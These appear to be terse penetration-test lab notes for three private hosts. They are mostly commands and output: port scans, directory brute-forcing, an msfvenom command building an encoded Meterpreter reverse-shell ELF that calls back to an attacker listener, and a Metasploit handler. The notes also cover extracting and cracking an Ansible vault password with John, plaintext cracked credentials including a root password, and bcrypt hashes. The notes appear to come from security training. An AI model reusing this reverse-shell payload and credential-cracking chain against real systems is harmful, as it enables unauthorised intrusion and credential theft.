192.168.153.171
192.168.153.172
192.168.153.173
rustscan -a 192.168.153.171 --ulimit 5000 -- -Pn -sC -sV -oA 171
rustscan -a 192.168.153.172 --ulimit 5000 -- -Pn -sC -sV -oA 172
rustscan -a 192.168.153.173 --ulimit 5000 -- -Pn -sC -sV -oA 173171
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.0 (protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.4.37 ((centos))
|_http-title: CentOS \xE6\x8F\x90\xE4\xBE\x9B\xE7\x9A\x84
|_http-server-header: Apache/2.4.37 (centos)
172
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
--user todd --password whyaretheresomanyants
173
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
8081/tcp open blackice-icecap? syn-ack
|_mcafee-epo-agent: ePO Agent not found
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 431
| Date: Wed, 10 Apr 2024 08:45:12 GMT
| Connection: close
| GetRequest:
| HTTP/1.1 200 OK
| Accept-Ranges: bytes
| ETag: W/"878-1597226105000"
| Last-Modified: Wed, 12 Aug 2020 09:55:05 GMT
| Content-Type: text/html
| Content-Length: 878
| Date: Wed, 10 Apr 2024 08:45:12 GMT
| Connection: close
| <!--
| Artifactory is a binaries repository manager.
| Copyright (C) 2018 JFrog Ltd.
| Artifactory is free software: you can redistribute it and/or modify
8082/tcp open http syn-ack Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: JFrog
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
1 service unrecognized despite returning data. If you know the service/version, please submit the following
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
marks: nothingwaschangedargh
Initial Findings
feroxbuster -k -u http://192.168.153.171 --force-recursion -C 404,405 -m GET,POST -e
http://192.168.153.171/uploads/
http://192.168.153.171/noindex/
msfvenom --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.45.212 LPORT=443 -e x64/xor_dynamic -i 8 -b "\x00" prependfork=true -t 300 -f elf -o challenge3.elf
sudo msfconsole -q -x "use linux/x64/meterpreter/reverse_tcp; set LHOST 192.168.45.212; set LPORT 443;exploit"
Initial Findings
feroxbuster -k -u http://192.168.153.173:8081 --force-recursion -C 404,405 -m GET,POST -e
http://192.168.153.173:8081/access/
http://192.168.153.173:8081/access/logout/
http://192.168.153.173:8081/access/error/
feroxbuster -k -u http://192.168.172.173:8082 --force-recursion -C 404,405 -m GET,POST -e
$ANSIBLE_VAULT;1.1;AES256
666437336533356566623438326334393535653438393865386437636435313430653666616336346262313438663539373565646533383430326130313532380a316132313636383633386532333765373238383430383937383138316361636436386231623236306564343464333466646132333930366638663531343866380a31363435333133333162356530383332366362326561613163393462313462656439343264376638643033633037666534656631333963333638326131653764
python3 /usr/share/john/ansible2john.py ./test.yml
test.yml:$ansible$0*0*9661a952b5822af9a21068e7afae3a119ef0312276baf5bc29d6e3ef312029d0
*87b6c306f61e89b5c586bd7e182f2806*28870193b1e448c6b45b68766bb731c3bcb77852f7ca54114d70
d52121101540
ansibleadm:bowwow
cat ansible | ansible-vault decrypt
Vault password:
lifeintheantfarm
Decryption successful
root:lifeintheantfarm for 171
ansible-playbook /opt/ansible/webserver.yaml --become --ask-vault-pass
bcrypt$$2a$08$T.fwsACylinHxvCYA2DDEufKQ/mf1UwmGdigcmZ9Szq8wxox.CeBa
bcrypt$$2a$08$Dpzo4GY4jaJgNWifBH2rwOogbuBtKOROO0czrv3bvicO4FXs1uOle